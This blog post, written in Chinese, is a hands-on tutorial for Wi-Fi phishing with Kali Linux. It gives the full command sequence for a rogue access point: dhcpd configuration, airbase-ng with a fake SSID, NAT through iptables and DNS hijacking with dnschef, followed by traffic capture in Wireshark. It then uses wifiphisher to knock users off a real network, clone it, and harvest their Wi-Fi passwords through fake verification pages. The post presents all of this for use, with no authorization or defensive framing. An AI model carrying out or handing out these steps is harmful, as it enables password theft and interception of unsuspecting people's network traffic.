电子证据 利用Kali进行wifi钓鱼实战详细教程

一、 Kali系统安装和必要软件安装:

二、利用kali建立钓鱼wifi:

建立热点

工具:isc-dhcp-server ;Aircrack-ng套件;iptables

isc-dhcp-server上面已装,其他的kali自带。

shell输入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打开文件命令,如没有这个文件,则创建。 
写入如下内容: 
authoritative;

default-lease-time 700; 
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 { 
option routers 10.0.0.1; 
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig wlan1 down #wlan1是你的网卡 这里意思是关闭wlan1网卡 
iwconfig wlan1 mode monitor #设置wlan1网卡为监听模式 
ifconfig wlan1 up #打开wlan1网卡 
airmon-ng start wlan1 #启动wlan1网卡的监听模式 

上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点 
airbase-ng -e Fishing -c 11 wlan1 #创建名为Fishing的热点,Fishing 自己改。 

热点的网络流量会被虚拟到at0这块网卡上面 

ifconfig at0 up #启用at0这块网卡 
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩码 
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由 
echo 1 > /proc/sys/net/ipv4/ip_forward #打开ip转发 

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 
service isc-dhcp-server start #开启 dhcp

然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT 
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat 
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面 
iptables -A FORWARD -p tcp –(两个-)syn -s 10.0.0.0/24 -j TCPMSS –(两个-)set-mss 1356 #修改最大报文段长度

注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)

(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)

劫持DNS

工具:dnschef

过程:

dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,对于所有请求转发到61.128.128.68进行解析。 

然后就可以用wireshark等工具抓包啦!

三、wifiphisher:

(要买一个无线网卡,淘宝23元一个,团购免邮费) 

这是一个wifi攻击脚本,详细介绍地址:https://github.com/sophron/wifiphisher

先,我们来下载wifiphisher: 

在shell框里输入命令: 
git clone https://github.com/sophron/wifiphisher.git

等待下载完毕,然后你可以在你下载的目录下看见wifiphisher这个文件夹。然后在这个文件夹运行 shell.

输入命令:python bin/wifiphisher 
如果是第一次运行脚本的话,它可能会出现提示安装hostpad的信息,键入Y继续安装即可。 

完成的时候,再次运行Wifiphisher脚本。

这次将运行8080和433端口的Web服务器,然后开始搜索附近的Wi-Fi网络。 

等待搜索完成,我们会发现一系列Wi-Fi网络名。 

然后按Ctrl+C 选择攻击的wifi

出现1、2、3三种模式,这三种模式代表发送不同的验证页面给连接的用户,具体的页面文件在wifiphisher目录下的 attack page中。也可以自己写一个。 

敲下回车,Wifiphisher会显示正在使用的界面,还有正被攻击及复制的AP所在的SSID。

然后已连接件被攻击wifi的用户会被强制断开,wifiphisher会copy这个被攻击的wifi,做一个伪装wifi(原理就如第二步),然后断开的用户将会再搜索到的是这个伪装wifi,当他们连接这个wifi时会接受到一个验证页面(3种模式有3种不同的页面),然后会要求用户输入密码,当用户输入密码提交后,你将会看见这个密码。 

如果他们连上这个伪装wifi,你就可以用wireshark等工具进行抓包啦~~!

posted on 2018-04-23 10:50  海燕。  阅读(3509)  评论(2编辑  收藏  举报